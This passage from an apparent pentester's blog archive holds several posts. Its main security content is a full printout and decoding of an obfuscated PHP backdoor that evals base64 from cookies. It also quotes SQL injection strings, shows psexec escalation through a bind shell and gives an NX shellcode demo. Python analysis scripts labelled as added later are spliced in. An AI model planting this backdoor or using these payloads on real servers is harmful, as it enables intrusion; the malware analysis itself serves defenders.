<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXRQu4fVP5GWnNW8spoKRfrkIxRun-aRpQQkV8jT-RHE_DgRuhKIB8Q-8pIJmZqjq9VeMZEfZGWcZxsiYzRLhCTNogy0Vf8ljyRVl-IxTkoz8AkO3wvrw68cHsgTS62WtbFlA8ft2U_yyD/s1600/capture1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXRQu4fVP5GWnNW8spoKRfrkIxRun-aRpQQkV8jT-RHE_DgRuhKIB8Q-8pIJmZqjq9VeMZEfZGWcZxsiYzRLhCTNogy0Vf8ljyRVl-IxTkoz8AkO3wvrw68cHsgTS62WtbFlA8ft2U_yyD/s1600/capture1.PNG" height="168" width="320" /></a></div>
<div>
<br /></div>
<br />
As you can see, adding a user is impossible due to our limited privileges. Let's assume we know the password of user <b><i>admin</i></b>, which is <i style="font-weight: bold;">admin123</i>. Can we use the <b>runas</b> command?<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9ZZlP47F8tc1-eNhGnwSxxUF0twrCLPmgTNduz3-wjftm8iT0NyNT_Ky7-HYeQzReajH8L-0hn-BbtJaLKmb7zINznSpzfmrA7UynkN09SyDbjANyK-dJ7gTwdPW-pgY2Vl0hWJuR42QV/s1600/capture2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9ZZlP47F8tc1-eNhGnwSxxUF0twrCLPmgTNduz3-wjftm8iT0NyNT_Ky7-HYeQzReajH8L-0hn-BbtJaLKmb7zINznSpzfmrA7UynkN09SyDbjANyK-dJ7gTwdPW-pgY2Vl0hWJuR42QV/s1600/capture2.PNG" height="98" width="320" /></a></div>
<br />
It seems runas fails because our bind-shell backdoor is not a real console: runas insists on reading the password from the interactive console input, which our shell cannot provide.<br />
<br />
All hope lost? Nope, we can use psexec to get around this: unlike runas, it takes the username and password on the command line (-u / -p), so no console prompt is needed. I would say "<b><i>psexec is like sudo</i></b>". <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgalWtgbkiH18OGrTxX4i8ZZl2nbI0IRT20Gy8OjIFzjMrfL7s_rB5dccwmnOBX3z_jsWdkbRk-UXQDeQ2FZmaVyN7Nv2FEYXb2gdaG51rlAYhKuF6YVfk4B8GejYU4NRJAbYmE71wP5O1j/s1600/capture3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgalWtgbkiH18OGrTxX4i8ZZl2nbI0IRT20Gy8OjIFzjMrfL7s_rB5dccwmnOBX3z_jsWdkbRk-UXQDeQ2FZmaVyN7Nv2FEYXb2gdaG51rlAYhKuF6YVfk4B8GejYU4NRJAbYmE71wP5O1j/s1600/capture3.PNG" height="121" width="320" /></a></div>
<br />
<br />
Why do I like psexec? I believe the Sysinternals tools are the "<i><b>universal Windows backdoor</b>.</i>"<br />
<i><br /></i>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKtWn6Vmd2aTqJQug7y9XFHbM9ku_XkFQZmR_z-aLfI87aPnt703zEck4nJdFk2lPl0W4pF_eP7p6eGBgzvGB3QsgrNVXi5Hd0LaW5sgDLlTZCa2F76HFO5lJ9KFHiwqa82teZ0cF71sei/s1600/capture4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKtWn6Vmd2aTqJQug7y9XFHbM9ku_XkFQZmR_z-aLfI87aPnt703zEck4nJdFk2lPl0W4pF_eP7p6eGBgzvGB3QsgrNVXi5Hd0LaW5sgDLlTZCa2F76HFO5lJ9KFHiwqa82teZ0cF71sei/s1600/capture4.PNG" height="105" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
This idea came from a Stack Overflow answer: <a href="http://stackoverflow.com/questions/12456675/single-line-command-for-run-as-different-user-in-window-7-that-contain-password">http://stackoverflow.com/questions/12456675/single-line-command-for-run-as-different-user-in-window-7-that-contain-password</a></div>
<i><br /></i></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4865819153630384661.post-31756995723074299562014-01-02T18:13:00.002+08:002014-01-02T18:30:07.484+08:002014: The Age of Pentest Apocalypse.<div dir="ltr" style="text-align: left;" trbidi="on">
Happy new year everyone.<br />
<br />
We are entering 2014. After doing pentests for so many years, I can safely say "<b>Penetration Testing is Dead</b>". <a href="http://defcon.org/images/defcon-16/dc16-presentations/defcon-16-banks-carric.pdf">I am not the first person to make such a statement</a>. Popping a remote shell and getting root has been quite challenging for the last 2 years (<i>challenging but not impossible</i>).<br />
<br />
<b>Summary from year 2013</b>.<br />
<br />
1. Secure frameworks are being deployed widely.<br />
2. IPS/IDS are being deployed widely (Juniper, Bluecoat, etc.).<br />
3. HIPS is becoming quite common (application whitelisting).<br />
4. SQL injection, XSS and remote code execution still exist, but they are no longer straightforward: it's quite rare to see ' or 1=1 # work, although ' or RAND() > 0.5 sometimes still does; WAFs are in wide use.<br />
5. VA (vulnerability assessment) is deadly inaccurate (<i>it might cover most, but not all</i>).<br />
6. Local clients are willing to sign up for a more offensive security testing approach (brute-force attacks, sniffing, etc.).<br />
7. Weak/default credentials remain the weakest link of all time.<br />
<br />
<b>Mandatory skills required in this age.</b><br />
<b><br /></b>
1. The art of tunneling and pivoting: mandatory for getting around firewalls.<br />
2. Bypassing antivirus/IDS/IPS: need I say more? Implementing your own VM...<br />
3. Bypassing HIPS: executing unlisted/blacklisted binaries outside the whitelisted set (usually Windows).<br />
4. Bypassing noexec mounts: knowledge of ld.so-based rootkits might help (usually *nix).<br />
5. Forensics and anti-forensics techniques.<br />
6. Modifying PoC exploits to suit your needs; MS08-067 is just not there anymore, lol.<br />
<br />
Expect to see more revolution in pentesting in 2014!<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="315" src="//www.youtube.com/embed/cQyqvA8geac" width="420"></iframe>
<br />
<br />
P/S: If someone comes around bragging to you about great tools, tell them pentest is dead.<br />
<br />
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4865819153630384661.post-79427346716990690972013-11-19T09:16:00.001+08:002013-11-19T09:16:16.191+08:00Iloveyou PHP Backdoor<div dir="ltr" style="text-align: left;" trbidi="on">
One of my botnets, er, honeynets managed to catch this nifty PHP script.<br />
<br />
<pre>&lt;?php
// Captured loader, reproduced as found (only the opening tag and comments are added).
// Every string carries junk fragments ("ar", "dk", "z", "of") that are stripped at
// run time to rebuild the function names and one long base64 blob.
$sdfv="oofJGEpofPjMpeyRrPSdvofdmVof5b3UnofO2VjaG8gJzwnLiRrLic+JztldmFsKGJhc2U2NF9kZWNvZGUocHJlZ19";
$kisg = str_replace("ar","","sartarrar_rarearparlaracare");      // rebuilds "str_replace"
$ltjz="yZofXBsYWNlKGFycmofF5KCcvW15cdz1cc10vJywnL1xzLycpLCBhofcnJofheSofgnJywnKycpL";
$ynsx="CBqb2luKGFycmF5X3NsaWNoflKCRofhLofCRjKCRhKS0zKSofkpKSkof7ZWNobyAnofPC8nLiRrLiofc+Jztof9";
$dkhg="JGofMof9J2NvofdW5of0JzskYT0kX0NPT0tofJRTtpZihyZXNldCgkYSk9ofPSdpbCcgJiYgJGMof";
$gsqn = $kisg("dk", "", "bdkadksdkedk64dk_dkddkecdkode");        // rebuilds "base64_decode"
$zuzt = $kisg("z","","zczrzezatze_zfzuznzcztzion");             // rebuilds "create_function"
// strip "of" from the concatenated blob (note the order: dkhg, sdfv, ltjz, ynsx),
// base64-decode it, wrap it in an anonymous function and call it immediately
$lyyq = $zuzt('', $gsqn($kisg("of", "", $dkhg.$sdfv.$ltjz.$ynsx))); $lyyq();?></pre>
<br />
It's pretty straightforward at a glance.<br />
<br />
$kisg is actually str_replace (the "ar" fragments are stripped out of the string).<br />
$gsqn is base64_decode (the "dk" fragments stripped).<br />
$zuzt is create_function (the "z" fragments stripped).<br />
<br />
Cleaning up this mess gives us:<br />
<br />
<pre>// the empty first argument is the parameter list of the anonymous function
$lyyq = create_function('', base64_decode("JGM9J2NvdW50JzskYT0kX0NPT0tJRTtpZihyZXNldCgkYSk9PSdpbCcgJiYgJGMoJGEpPjMpeyRrPSdvdmV5b3UnO2VjaG8gJzwnLiRrLic+JztldmFsKGJhc2U2NF9kZWNvZGUocHJlZ19yZXBsYWNlKGFycmF5KCcvW15cdz1cc10vJywnL1xzLycpLCBhcnJheSgnJywnKycpLCBqb2luKGFycmF5X3NsaWNlKCRhLCRjKCRhKS0zKSkpKSk7ZWNobyAnPC8nLiRrLic+Jzt9"));</pre>
<br />
Final output (the decoded body that create_function('', ...) turns into $lyyq):<br />
<br />
<pre>// body of the anonymous function; runs on every request via $lyyq()
$c='count';$a=$_COOKIE;if(reset($a)=='<b>il</b>' && $c($a)>3){$k='<b>oveyou</b>';echo '<'.$k.'>';eval(base64_decode(preg_replace(array('/[^\w=\s]/','/\s/'), array('','+'), join(array_slice($a,$c($a)-3)))));echo '</'.$k.'>';}</pre>
<br />
<div>
<br /></div>
Conclusion? The author of this backdoor must be romantic... In practice the trigger is: the first cookie value must be il, there must be more than three cookies, and the last three cookie values, joined together, are cleaned up (everything except word characters, = and whitespace is dropped, whitespace is turned back into +), base64-decoded and handed to eval(). The output is wrapped in &lt;oveyou&gt;...&lt;/oveyou&gt; tags so the operator can pick it out of the page.<br />
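As an added example (not code from the original post), here is a Python re-implementation of the unpacking stages above and of the cookie gate in the decoded body. It re-creates only the two PHP calls the loader depends on (str_replace with an empty replacement and base64_decode); the fragment strings are copied from the captured sample, and the cookies used to exercise the trigger are constructed.

```python
"""Unpack the obfuscated PHP loader stage by stage and mirror its cookie trigger.

Added example, not code from the original post. The four fragment strings are
copied from the captured sample; the request cookies used in the demo are
constructed.
"""
import base64
import re

# fragments exactly as they appear in the captured loader
DKHG = "JGofMof9J2NvofdW5of0JzskYT0kX0NPT0tofJRTtpZihyZXNldCgkYSk9ofPSdpbCcgJiYgJGMof"
SDFV = "oofJGEpofPjMpeyRrPSdvofdmVof5b3UnofO2VjaG8gJzwnLiRrLic+JztldmFsKGJhc2U2NF9kZWNvZGUocHJlZ19"
LTJZ = "yZofXBsYWNlKGFycmofF5KCcvW15cdz1cc10vJywnL1xzLycpLCBhofcnJofheSofgnJywnKycpL"
YNSX = "CBqb2luKGFycmF5X3NsaWNoflKCRofhLofCRjKCRhKS0zKSofkpKSkof7ZWNobyAnofPC8nLiRrLiofc+Jztof9"


def php_strip(junk, s):
    """PHP str_replace($junk, '', $s): left-to-right, non-overlapping, same as str.replace."""
    return s.replace(junk, "")


def php_base64_decode(s):
    """PHP's base64_decode() tolerates missing padding; Python's does not, so pad first."""
    return base64.b64decode(s + "=" * (-len(s) % 4)).decode("latin-1")


def unpack_loader():
    """Return the rebuilt function names, the base64 blob and the decoded body."""
    funcs = {
        "kisg": php_strip("ar", "sartarrar_rarearparlaracare"),
        "gsqn": php_strip("dk", "bdkadksdkedk64dk_dkddkecdkode"),
        "zuzt": php_strip("z", "zczrzezatze_zfzuznzcztzion"),
    }
    # the loader concatenates the fragments in this order before stripping "of"
    blob = php_strip("of", DKHG + SDFV + LTJZ + YNSX)
    return funcs, blob, php_base64_decode(blob)


def backdoor_traits(body):
    """Indicators a responder can grep for in other samples of this family."""
    return {
        "reads_cookies": "$_COOKIE" in body,
        "evals_decoded_input": "eval(base64_decode(" in body,
        "cookie_gate": "reset($a)=='il'" in body,
        "output_marker": "oveyou" in body,  # output is wrapped in <oveyou>...</oveyou>
    }


def recover_second_stage(cookies):
    """Mirror the decoded body on a captured request.

    cookies: ordered list of (name, value) pairs, in the order PHP fills $_COOKIE.
    Returns the PHP source the backdoor would eval(), or None when the gate
    (first value 'il', more than three cookies) is not satisfied.
    """
    values = [v for _, v in cookies]
    if not values or values[0] != "il" or len(values) <= 3:
        return None
    joined = "".join(values[-3:])                               # join(array_slice($a, count-3))
    cleaned = re.sub(r"[^\w=\s]", "", joined, flags=re.ASCII)  # preg_replace('/[^\w=\s]/', '')
    cleaned = re.sub(r"\s", "+", cleaned)                      # preg_replace('/\s/', '+')
    return php_base64_decode(cleaned)


if __name__ == "__main__":
    funcs, blob, body = unpack_loader()
    print(funcs)
    print(body)
    print(backdoor_traits(body))
    # constructed request: gate satisfied, payload split over the last three cookies
    demo = [("a", "il"), ("PHPSESSID", "x"), ("p1", "ZWNobyBw"), ("p2", "aHBfdW5h"), ("p3", "bWUoKTs=")]
    print(recover_second_stage(demo))
```

The same recover_second_stage() can be pointed at the Cookie header of any request captured at the web server (the access log alone will not show it, since the whole channel lives in cookies), which is how you find out what the operator actually ran.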
<br />
<br />
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4865819153630384661.post-24076468597643490162013-10-25T22:22:00.001+08:002013-10-25T22:22:09.630+08:00Replicating Malware Function For Fun and Profits!!!!<div dir="ltr" style="text-align: left;" trbidi="on">
At Scan Assoc, we are allowed to play and be creative with our viruses/malware to the max, without any useless restraining policy...<br />
If you read this <a href="http://www.cert.pl/news/7662/langswitch_lang/en">post </a> and see the video below:<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="315" src="//www.youtube.com/embed/TjOOaWE4Vq4" width="420"></iframe>
<br />
You know it's fun.<br />
Basically it uses VBScript to copy the clipboard...<br />
<br />
I've replicated a similar technique using VBScript and a batch script as a PoC.<br />
It's a very innovative attack for phishing.<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="315" src="//www.youtube.com/embed/BnzZk9V12jg" width="420"></iframe>
The source code is in the video.<br />
This is just a PoC; there is a way to bypass the latest IE clipboard security warning!<br />
<br />
<br />
<br /></div>
Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-4865819153630384661.post-61784700583403869482013-10-13T15:47:00.002+08:002013-10-13T20:52:47.751+08:00A simple explanation about NX/Pax works.<div dir="ltr" style="text-align: left;" trbidi="on">
This is nothing more than a recap of how NX/PaX works and why it is important to understand for beginners in exploitation, for CTF players :p, and for reading other people's interesting papers.<br />
<div>
<br /></div>
<div>
Below is the simplest, and deliberately bad, example of how to execute shellcode.</div>
<div>
<br />
<pre>#include &lt;stdio.h&gt;

/* 0xcc is the x86 INT3 breakpoint instruction: if the CPU ever executes it we
   get SIGTRAP ("Trace/breakpoint trap"); a SIGSEGV means we never got that far */
unsigned char code[] = "\xcc";

int main(int argc, char **argv)
{
    int (*func)();             /* declare a function pointer */
    func = (int (*)()) code;   /* point it at the byte buffer */
    (*func)();                 /* jump into the buffer */
    return 0;
}</pre>
<pre></pre>
<pre></pre>
<pre><div style="font-family: 'Times New Roman'; white-space: normal;">
Explanation:<br />
1. We declare a function pointer called func.<br />
2. func is pointed at the memory location of code[].<br />
3. Calling func() executes whatever bytes reside in code[], i.e. our "shellcode".<br />
Try compiling and running:<br />
<pre>gcc example1.c -o example ; ./example
Segmentation fault
</pre>
Why? Modern toolchains and kernels enforce the NX (no-execute) bit by default on every region of a process that is meant to hold data: the stack, where local variables live, and the binary's data segment, where an initialised global like code[] lives. What does that mean for us? To generalize, a region of memory can have three properties:<br />
1. Read: we can read the memory.<br />
2. Write: we can write data to that region.<br />
3. Execute: the bytes in that region can be executed as code.<br />
<pre>cat /proc/3976/maps
08048000-08049000 r-xp 00000000 08:01 1447191 /root/bypassav/example
08049000-0804a000 rw-p 00000000 08:01 1447191 /root/bypassav/example
b7e62000-b7e63000 rw-p 00000000 00:00 0
b7e63000-b7fbf000 r-xp 00000000 08:01 1311258 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fbf000-b7fc0000 ---p 0015c000 08:01 1311258 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fc0000-b7fc2000 r--p 0015c000 08:01 1311258 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fc2000-b7fc3000 rw-p 0015e000 08:01 1311258 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fc3000-b7fc6000 rw-p 00000000 00:00 0
b7fdf000-b7fe1000 rw-p 00000000 00:00 0
b7fe1000-b7fe2000 r-xp 00000000 00:00 0 [vdso]
b7fe2000-b7ffe000 r-xp 00000000 08:01 1311294 /lib/i386-linux-gnu/ld-2.13.so
b7ffe000-b7fff000 r--p 0001b000 08:01 1311294 /lib/i386-linux-gnu/ld-2.13.so
b7fff000-b8000000 rw-p 0001c000 08:01 1311294 /lib/i386-linux-gnu/ld-2.13.so
bffdf000-c0000000 rw-p 00000000 00:00 0 [stack]
</pre>
As you can see, the data segment of the binary (08049000-0804a000, where code[] lives) and the [stack] region are both marked rw-p. No x means the CPU refuses to execute bytes in those regions, which is why the jump into code[] ends in a segmentation fault.<br />
Now that we understand the writable regions are protected, attackers have evolved towards ROP and ret2libc-style programming, but that is beyond the scope of this post. Having said that, it is still possible to get your code executed with the mmap trick: map a fresh page with PROT_READ|PROT_WRITE|PROT_EXEC and copy the shellcode there (PaX MPROTECT, where enforced, blocks exactly this). To make everyone happy, here I cheat a little with execstack just to see the difference. execstack -s flips the PT_GNU_STACK header of the binary to request an executable stack, and the kernel used here answers by enabling READ_IMPLIES_EXEC for the whole process, which is why every readable mapping in the second dump, not only the stack, comes back as rwxp and the INT3 finally runs:<br />
<pre>gcc example1.c -o example ; execstack -s example; ./example
Trace/breakpoint trap
</pre>
</div>
<pre>cat /proc/4125/maps
08048000-08049000 r-xp 00000000 08:01 1447203 /root/bypassav/example
08049000-0804a000 rwxp 00000000 08:01 1447203 /root/bypassav/example
b7e62000-b7e63000 rwxp 00000000 00:00 0
b7e63000-b7fbf000 r-xp 00000000 08:01 1311258 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fbf000-b7fc0000 ---p 0015c000 08:01 1311258 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fc0000-b7fc2000 r-xp 0015c000 08:01 1311258 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fc2000-b7fc3000 rwxp 0015e000 08:01 1311258 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fc3000-b7fc6000 rwxp 00000000 00:00 0
b7fdf000-b7fe1000 rwxp 00000000 00:00 0
b7fe1000-b7fe2000 r-xp 00000000 00:00 0 [vdso]
b7fe2000-b7ffe000 r-xp 00000000 08:01 1311294 /lib/i386-linux-gnu/ld-2.13.so
b7ffe000-b7fff000 r-xp 0001b000 08:01 1311294 /lib/i386-linux-gnu/ld-2.13.so
b7fff000-b8000000 rwxp 0001c000 08:01 1311294 /lib/i386-linux-gnu/ld-2.13.so
<b>bffdf000-c0000000 rwxp 00000000 00:00 0 [stack]
</b></pre>
</pre>
</div>
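As an added example (not code from the original post), here is a Python audit of the two maps dumps above: it parses /proc/PID/maps lines, tells you whether a given address is executable, and lists every region that is writable and executable at the same time. The dumps are excerpts of the ones shown above; the address used for code[] is an assumed one inside the binary's data segment.

```python
"""Audit a /proc/<pid>/maps dump for regions that are both writable and executable.

Added example (not code from the original post). MAPS_NX and MAPS_EXECSTACK
are excerpts of the two dumps shown above (normal build, and after
`execstack -s`). CODE_ADDR is an assumed address inside the binary's .data
segment, standing in for the global `code[]` buffer.
"""
import re

MAPS_NX = """\
08048000-08049000 r-xp 00000000 08:01 1447191 /root/bypassav/example
08049000-0804a000 rw-p 00000000 08:01 1447191 /root/bypassav/example
b7e63000-b7fbf000 r-xp 00000000 08:01 1311258 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fc2000-b7fc3000 rw-p 0015e000 08:01 1311258 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
bffdf000-c0000000 rw-p 00000000 00:00 0 [stack]
"""

MAPS_EXECSTACK = """\
08048000-08049000 r-xp 00000000 08:01 1447203 /root/bypassav/example
08049000-0804a000 rwxp 00000000 08:01 1447203 /root/bypassav/example
b7e63000-b7fbf000 r-xp 00000000 08:01 1311258 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fc2000-b7fc3000 rwxp 0015e000 08:01 1311258 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
bffdf000-c0000000 rwxp 00000000 00:00 0 [stack]
"""

CODE_ADDR = 0x08049040  # assumed: somewhere inside .data, where code[] is placed

# address range, perms, file offset, device, inode, optional path
MAPS_LINE = re.compile(
    r"^(?P<start>[0-9a-f]+)-(?P<end>[0-9a-f]+)\s+(?P<perms>[rwxsp-]{4})\s+"
    r"(?P<offset>[0-9a-f]+)\s+(?P<dev>\S+)\s+(?P<inode>\d+)\s*(?P<path>.*)$"
)


def parse_maps(text):
    """Turn maps lines into dicts with integer bounds, a perms string and a path."""
    regions = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = MAPS_LINE.match(line)
        if m is None:
            raise ValueError("unparseable maps line: %r" % line)
        d = m.groupdict()
        regions.append({
            "start": int(d["start"], 16),
            "end": int(d["end"], 16),
            "perms": d["perms"],
            "path": d["path"] or "[anon]",
        })
    return regions


def region_for(regions, addr):
    """Return the region containing addr, or None if it is unmapped."""
    for r in regions:
        if r["start"] <= addr < r["end"]:
            return r
    return None


def can_execute(regions, addr):
    """True if a jump to addr could run code there (the page has the x bit)."""
    r = region_for(regions, addr)
    return r is not None and "x" in r["perms"]


def wx_regions(regions):
    """Regions that violate W^X: writable and executable at the same time."""
    return [r for r in regions if "w" in r["perms"] and "x" in r["perms"]]


if __name__ == "__main__":
    for label, dump in (("NX build", MAPS_NX), ("execstack -s", MAPS_EXECSTACK)):
        regions = parse_maps(dump)
        print("%s: code[] executable=%s, W+X regions=%s" % (
            label, can_execute(regions, CODE_ADDR),
            [r["path"] for r in wx_regions(regions)]))
```

On a live system you would feed it open("/proc/%d/maps" % pid).read(); any hit from wx_regions() on a process that is not a JIT is worth a look, since that is the mapping a dropped shellcode would want.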
<br />
<br />
Oh, HITB 2013 KUL starts tomorrow. See you there soon!<br />
<div style="font-family: 'Times New Roman'; white-space: normal;">
</div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4865819153630384661.post-32816159778621996962013-09-16T09:36:00.001+08:002013-09-17T09:06:01.281+08:00bat script setting your notebook as a wireless . AP<div dir="ltr" style="text-align: left;" trbidi="on">
Captive portals and Layer 2 isolation are a no-no for Chromecast. I'm in Kelate right now, so here's a quick batch script for turning your Windows 7 notebook into an AP. Run it as administrator, of course.<br />
<div>
<br />
<div>
<br /></div>
<div>
ap.bat</div>
<div>
<br /></div>
<div>
<pre>@ECHO OFF
REM allow the hosted network (the virtual AP) on the wireless adapter
netsh wlan set hostednetwork mode=allow
REM SSID and WPA2-PSK key; the key must be 8 to 63 ASCII characters
netsh wlan set hostednetwork ssid=PUTYOUROWNSSID key=buhpasswordsendiri keyUsage=persistent
REM bring the AP up
netsh wlan start hostednetwork</pre></div>
</div>
<div>
<br /></div>
<div>
<div>
</div>
<div>
<br />
<br />
Then share your mobile data connection (or whatever uplink you have) with Internet Connection Sharing (ICS). More info:<br />
<br />
<a href="http://msdn.microsoft.com/en-us/library/dd815243%28VS.85%29.aspx">http://msdn.microsoft.com/en-us/library/dd815243%28VS.85%29.aspx</a><br />
<br />
<br />
<br /></div>
</div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4865819153630384661.post-64415794183120731652013-09-13T16:51:00.001+08:002013-09-13T16:52:18.117+08:00Chromecast Experience in .MY Part 3<div dir="ltr" style="text-align: left;" trbidi="on">
<b>Okay, part 3. It's pretty short and simple. They say that once you manage to produce a UML diagram, the program is already complete :p</b><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBGZqGj1RqbxQIuFwa-UaKMDm2N_uoDoASC4RLMdzFXWVKZY1v3rj3gkHFLZjkgirgwTPmX5XIC7OieRMsNEFquqyz8LFp8miHqjQcRLMwXcTtSN96RizHJ_0eYBCnS4DoS6zzfWgrCns7/s1600/cdraw.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="130" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBGZqGj1RqbxQIuFwa-UaKMDm2N_uoDoASC4RLMdzFXWVKZY1v3rj3gkHFLZjkgirgwTPmX5XIC7OieRMsNEFquqyz8LFp8miHqjQcRLMwXcTtSN96RizHJ_0eYBCnS4DoS6zzfWgrCns7/s320/cdraw.png" width="320" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuZDUyyP5q6Hqn7Kkiksjq5isb84bAHLo2Zx-EGhvIhpNFrnxPWDh-1YXfe8feoL_CFwmJRdAniFvS4dd0Bj4p_ACPQ7VI-HpX0LWCryWhvGgg_qHT2O0rKPY_tFKjl_OEzVCZJVhe0O2k/s1600/1209050_10201623994817092_439427285_n.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuZDUyyP5q6Hqn7Kkiksjq5isb84bAHLo2Zx-EGhvIhpNFrnxPWDh-1YXfe8feoL_CFwmJRdAniFvS4dd0Bj4p_ACPQ7VI-HpX0LWCryWhvGgg_qHT2O0rKPY_tFKjl_OEzVCZJVhe0O2k/s320/1209050_10201623994817092_439427285_n.jpg" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br /></div>
Unknownnoreply@blogger.com3tag:blogger.com,1999:blog-4865819153630384661.post-24134410505759172852013-09-13T02:34:00.005+08:002013-09-13T02:49:16.971+08:00Chromecast Experience in .MY Part 2.<div dir="ltr" style="text-align: left;" trbidi="on">
<b>"Check out my new Iphone, It's using a 64 bit ARM. Not sure what it does but cool"</b><br />
<b>"My latest Samsung is using triple core processor. It's fast."</b><br />
<b><br /></b>
Unless you get a direct benefit from those features, you are nothing more than a mere human being consumed by the homogenization of modernity.<br />
<br />
This is the second part of the Chromecast Experience. How does Chromecast work?<br />
The Chromecast Developer Guide has a beautiful picture of it.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://developers.google.com/cast/images/Diagram.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="https://developers.google.com/cast/images/Diagram.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
So how does casting work? When the Chromecast boots, a web service starts and listens on port 8008. From a black-box point of view it is probably a heavily modified node.js, most likely with a RESTful web API. Oh, and it uses <a href="http://docs.google.com/viewer?a=v&pid=sites&srcid=ZGlhbC1tdWx0aXNjcmVlbi5vcmd8ZGlhbHxneDo1NTA2NDQ5MDZmMzdkNzI0">DIAL</a>.</div>
<div class="separator" style="clear: both; text-align: left;">
So how does it work in practice? Let's run a sniffer. Many people would prefer tcpdump or Wireshark, but Windows does it nicely with <a href="http://www.microsoft.com/en-my/download/details.aspx?id=4865">Microsoft Network Monitor</a>. The coolest thing about this tool is that you can filter by application; in this case we filter on chrome.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Each time we issue a cast we actually "dial" for it. When casting to the YouTube application, we send a GET request to /apps/YouTube.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrjcU-GmLL4b1902moXDlnXsvHf7U01Lpx3aNIUmOSI-8ntd6_3Dzr5FcKn6qhQgkNpEf7jbcyAMh_XbXQPVR5qaG9O-ft-gZgaM6hXqz1pwUYmdtAKe6nVoxaR2eUvFCDZWYPc2ztSarK/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="136" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrjcU-GmLL4b1902moXDlnXsvHf7U01Lpx3aNIUmOSI-8ntd6_3Dzr5FcKn6qhQgkNpEf7jbcyAMh_XbXQPVR5qaG9O-ft-gZgaM6hXqz1pwUYmdtAKe6nVoxaR2eUvFCDZWYPc2ztSarK/s320/1.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The information we retrieve comes back in XML format, hinting at the DIAL implementation in Chromecast.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG1mkAIpV1LsjLZrSI7qGxJVZXrGog1UAENmlkyNx19QX-dxWPySb2dD9V1EF3fdvHlQbXvBZkGjJZCu04UGC9OmphQKIBRM_nnHl60eTE_eykHlYPPAy408WDFNWALvNTtyn5459ntM0T/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="155" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG1mkAIpV1LsjLZrSI7qGxJVZXrGog1UAENmlkyNx19QX-dxWPySb2dD9V1EF3fdvHlQbXvBZkGjJZCu04UGC9OmphQKIBRM_nnHl60eTE_eykHlYPPAy408WDFNWALvNTtyn5459ntM0T/s320/1.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
